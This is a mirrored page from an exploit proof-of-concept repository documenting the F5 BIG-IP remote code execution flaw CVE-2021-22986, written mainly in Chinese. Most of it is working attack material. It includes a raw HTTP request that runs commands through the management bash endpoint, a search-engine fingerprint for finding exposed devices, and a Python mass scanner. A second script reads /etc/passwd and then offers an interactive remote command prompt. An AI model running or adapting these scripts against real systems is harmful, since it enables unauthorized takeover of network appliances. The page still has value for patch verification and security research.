admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

205 lines
6.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# F5 BIG-IP 远程代码执行漏洞 CVE-2021-22986
## 漏洞描述
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。
近日F5发布了F5 BIG-IQ/F5 BIG-IP 代码执行代码执行的风险声明F5安全公告更新了BIG-IPBIG-IQ中的多个严重漏洞。建议广大用户及时将f5 big-iq,f5 big-ip升级到最新版本避免遭到攻击。
## 漏洞影响
```
F5 BIG-IP 16.x: 16.1.0.3
F5 BIG-IP 15.x: 15.1.0.4
F5 BIG-IP 14.x: 14.1.2.6
F5 BIG-IP 13.x: 13.1.3.4
F5 BIG-IP 12.x: 12.1.5.2
F5 BIG-IP 11.x: 11.6.5.2
```
## 网络测绘
```
icon_hash="-335242539"
```
## 漏洞复现
访问登录页面如下
![](images/202202101921704.png)
发送请求包
```plain
POST /mgmt/tm/util/bash HTTP/1.1
Host: xxx.xxx.xxx.xxx:8443
Connection: close
Content-Length: 41
Cache-Control: max-age=0
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token:
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c id"}
```
![](images/202202101921038.png)
成功执行命令 id
## 漏洞POC
**批量测试**
```python
import requests
import sys
import random
import re
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: F5 BIG-IP \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mFile >>> ip.txt \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/mgmt/tm/util/bash"
headers = {
"Authorization": "Basic YWRtaW46QVNhc1M=",
"X-F5-Auth-Token": "",
"Content-Type": "application/json"
}
data = '{"command":"run","utilCmdArgs":"-c id"}'
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=2)
if "commandResult" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {}存在漏洞,响应为:{} \033[0m".format(target_url, json.loads(response.text)["commandResult"]))
else:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url))
def Scan(file_name):
with open(file_name, "r", encoding='utf8') as scan_url:
for url in scan_url:
if url[:4] != "http":
url = "https://" + url
url = url.strip('\n')
try:
POC_1(url)
except Exception as e:
print("\033[31m[x] 请求报错 \033[0m".format(e))
continue
if __name__ == '__main__':
title()
file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))
Scan(file_name)
```
![](images/202202101921330.png)
**命令执行**
```python
import requests
import sys
import random
import re
import base64
import time
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: F5 BIG-IP \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
vuln_url = target_url + "/mgmt/tm/util/bash"
headers = {
"Authorization": "Basic YWRtaW46QVNhc1M=",
"X-F5-Auth-Token": "",
"Content-Type": "application/json"
}
data = '''{"command":"run","utilCmdArgs":"-c 'cat /etc/passwd'"}'''
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
if 'root' in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {}存在漏洞,响应为:{} \033[0m".format(target_url, json.loads(response.text)["commandResult"]))
while True:
Cmd = str(input("\033[35mCmd >>> \033[0m"))
POC_2(target_url, Cmd)
else:
print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))
except Exception as e:
print("\033[31m[x] 目标 {} 请求失败 \033[0m".format(target_url), e)
def POC_2(target_url, Cmd):
vuln_url = target_url + "/mgmt/tm/util/bash"
headers = {
"Authorization": "Basic YWRtaW46QVNhc1M=",
"X-F5-Auth-Token": "",
"Content-Type": "application/json"
}
Cmd = "'" + Cmd + "'"
data = '{"command":"run","utilCmdArgs":"-c %s"}' % Cmd
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[32m{} \033[0m".format(json.loads(response.text)["commandResult"]))
except Exception as e:
print("\033[31m[x] 命令执行失败 \033[0m".format(target_url), e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
POC_1(target_url)
```
![](images/202202101921502.png)
Reference in New Issue View Git Blame Copy Permalink